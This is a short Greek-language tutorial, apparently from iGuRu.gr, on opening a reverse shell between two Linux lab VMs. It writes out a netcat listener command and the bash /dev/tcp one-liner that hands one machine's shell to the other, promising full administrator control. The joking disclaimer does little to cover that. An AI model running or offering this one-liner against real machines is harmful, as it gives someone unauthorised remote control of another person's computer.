Οδηγός για Reverse Shell μεταξύ δύο μηχανημάτων Linux


Σε αυτόν τον οδηγό πρόκειται να σας δείξουμε πώς να φτιάξετε ένα reverse shell ανάμεσα σε δύο μηχανήματα Linux.

Για τον σκοπό αυτόν θα χρησιμοποιούμε δύο VM που τρέχουν linux, το ένα θα είναι το Kali Linux και το άλλο θα είναι το Backtrack Linux.

  • Για Kali Linux Machine IP – 192.168.179.137
  • Για Backtrack Linux Machine IP – 192.168.179.139

Τι είναι το Reverse Shell

Συνήθως όταν πραγματοποιείτε οποιαδήποτε σύνδεση TCP / IP μεταξύ δύο υπολογιστών, τότε ένας διακομιστής (server) χειρίζεται τη σύνδεση και ένας άλλος ο λεγόμενος πελάτης (client) προσπαθεί να πραγματοποιήσει τη σύνδεση.

Πού μπορείτε να χρησιμοποιήσετε το Reverse Shell

Απλώς σκεφτείτε ότι θέλετε να βοηθήσετε έναν φίλο, αλλά δεν διαθέτει διακομιστή (server) με port forward (προώθηση πόρτας) κλπ και φυσικά να μην μπορείτε να συνδεθείτε στο μηχάνημά του. Σε αυτήν την περίπτωση μπορείτε να χρησιμοποιήσετε το Reverse Shell, ώστε να λάβετε με reverse TCP / IP μία σύνδεση στο μηχάνημα του φίλου σας ,με πλήρη πρόσβαση διαχειριστή.

Μην σκέφτεστε παράνομα, δεν θέλω ζαβολιές 🙂

Τώρα πρόκειται να χρησιμοποιήσουμε το Netcat από την πλευρά του διακομιστή, δηλαδή στο BT Machine. Το Netcat είναι ένα δωρεάν βοηθητικό πρόγραμμα δικτύου, που χρησιμοποιείται για ανάγνωση / εγγραφή για TCP και UDP sockets.

Βήμα 1: Το πρώτο σας βήμα είναι να θέσετε το μηχάνημά σας σε λειτουργία listening με τη βοήθεια της ακόλουθης εντολής:

Εντολή: nc -l -vv -p 1337

Εδώ, -l σημαίνει λειτουργία listening, -vv σημαίνει λειτουργία verbose και -p μας δείχνει τη θύρα που χρησιμοποιείται για τον διακομιστή.

Μόλις τρέξετε την εντολή στο μηχάνημά σας (BT), θα πρέπει να σας εμφανίσει το παρακάτω:

Βήμα 2: Τώρα πηγαίνετε στο μηχάνημα του client, δηλαδή στο Kali Linux Machine που θέλετε να ελέγξετε από το τερματικό σας. Εδώ πρόκειται να ανακατευθύνουμε το τυπικό i / o / e του bash client στον διακομιστή με τη βοήθεια της εντολής bash:

Εντολή: bash -i &> /dev/tcp/192.168.179.139/1337 0> & 1

Εδώ το bash -i μας δείχνει ότι το Interactive bash, &> / dev / tcp / <IP> / <PORT> stand ανακατευθύνει την τυπική έξοδο και το σφάλμα του bash στον διακομιστή, καθώς και ότι 0> & 1 σημαίνει σύνδεση της τυπικής εισόδου του bash με την έξοδο.

Εδώ και τα δύο μηχανήματα συνδέονται στο ίδιο δίκτυο μέσω της λειτουργίας NAT, οπότε θα χρησιμοποιήσουμε την τοπική μας IP.

Μόλις εσείς ή ο φίλος σας εκτελέσετε την παραπάνω εντολή στο μηχάνημα σας, θα συνδεθείτε με αυτό και θα μπορείτε να το ελέγχετε πλήρως, μέσω του shell τερματικού.


Καλή επιτυχία.


Διαβάστε τις Τεχνολογικές Ειδήσεις από όλο τον κόσμο, με την εγκυρότητα του iGuRu.gr

Ακολουθήσετε μας στο Google News iGuRu.gr at Google news